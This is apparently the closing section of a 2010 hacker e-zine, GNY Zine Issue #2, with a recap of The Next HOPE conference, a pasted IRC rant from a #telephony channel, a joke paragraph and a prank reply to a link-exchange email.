The Next HOPE was a blast. storm, m0nkee, c1rcuit, and HIT_007 hung out and had a netbook/laptop orgy at the good ol' Hotel Pennsylvania for the weekend, representing GNY well. Media and various shitz from the conference are posted up at http://gonullyourself.org/hope/. You will see a link to our QR code there - it was an idea we had while at the con. We got ASCII goatse'd by scanning one... it made sense that we make our own. It linked to a simple message board that we created for people to communicate during the con. It went pretty well, and although it was put up rather late, it was still a success.

Moving on, the talks were done well for the most part. The social engineering panel was fun as always, but the biggest and most popular story was of course the Wikileaks vs. Adrian Lamo controversy. Mr. Lamo was in attendance and us HOPE-goers were given a chance to ask him questions.
People were mature about that... for the most part. The only real complaint would be that there was definitely room for more technical talks and topics other than privacy, but 2600 has always been pretty political. In any event, for those who have never been to HOPE or a conference in general, it is certainly recommended. GNY road trip to Defcon next year..? :D

#telephony shenanigans!
----------------------------------------------------------------------------------------------------

* HACKER (~HACKER@99.56.199.228) has joined #telephony
BEAVE I WANT MY ACCESS TO TELEPHREAK TELEPRHEAK IS FULL OF NEW PEOPLE I HAVE YOU DEFCON BEAVE KICKED ME OUT LADYNIKON THEY DON'T KNOW IM A HACKER MODE DEFCON IS LOCATED IN LOS ANGELES ? HONESTLY TELEPHREAK I AM A HACKER/PHREAKER/CRACKER YOU KNOW IT DOES NOT MATTER IF I LEAVE MY TRACE ON THE LOGINS SOON IT WILL MATTER DEFCON NEEDS TO SEE LOS ANGELES TALKEE BEAVE IS A PHREAKER? A HACKER TYPE? BEAVE KNOWS MY IP BEAVE CONTACT ME THROUGH SSH COME HERE BEAVE BEAVE IS NO HACKER REMEMBER THAT BEAVE AND LADYNIKON ARE JUST NEW LADY NIKON IS NO HACKER BEAVE IS NO HACKER
* HACKER (~HACKER@99.56.199.228) Quit (Quit: Leaving)

(By the way, does anyone know who this fellow is? He also goes by the name looptroop and has been regularly talking to himself in #telephony and #phreak on 2600net about nonsensical conspiracy theories for almost a year now. Dude has some persistence. @_@)

Better than disk encryption!
----------------------------------------------------------------------------------------------------

open up the case OUT OF NOWHERE FUCKING DEADLY SPIDERS and a snapper turtle just for fun did you recover the harddrive .... no sir it was guarded by a 175 lb snapping turtle lets let this one go his name was alph and while his name sounded whimsical and friendly I disagreed with his views on politics

Wait, what?
----------------------------------------------------------------------------------------------------

Date: Sat, 11 Sep 2010 07:01:30 +0530
Subject: Banner Exchange
From: Indian Cyber Army
To: hixmostorm@hotmail.com

Hi, I'm the owner of Indian Cyber Army (ICA) @ http://cyberarmy.in

I see ur site. Its really nice. We are now allowing and inviting webmasters to do Banner Exchange. That will make Profit for both of us. Indian cyber army is totally a Cyber security Community. Hope you know already about it. So, I need members of cyber field, and u need traffic and backlink.

Waiting for your positive reply...

Owner, ICA.

-=-=-

Date: Sat, 11 Sep 2010 22:11:08 -0400
Subject: RE: Banner Exchange
From: storm gny
To:

Hi ICA,

Thank you for considering us for a link exchange. I've passed on your request to the members of the GNY review board, and we'll get back to you within the week. It usually takes only a few days, but we're busy arranging the funeral for m0nkee since he got hit by a bus on Thursday. Wrong place, wrong time I guess.

Anyways, talk to you soon.

Regards,
John Travolta

-=-=-

Date: Sun, 12 Sep 2010 08:25:29 +0530
Subject: Re: Banner Exchange
From: Indian Cyber Army
To: storm gny

Okay, me also will add a new page on my site for banner exchange, there ur logo will be added, after I getting ur response that u add my banner on ur site.

Thank you.

Admin, ICA.

...>_>

Anyways, it looks like you've reached the end of GNY Zine, Issue #2. The next issue is already in progress, so (if everything goes according to plan), we'll see you again in January. Our contact information is in the introduction, and we'll try our best to respond to your messages within a reasonable time. If you have content for future issues, send it in!

As always, may your hax be plentiful and full of fish. Oh, and red boxing isn't dead.

<3, the gny crew

[==================================================================================================]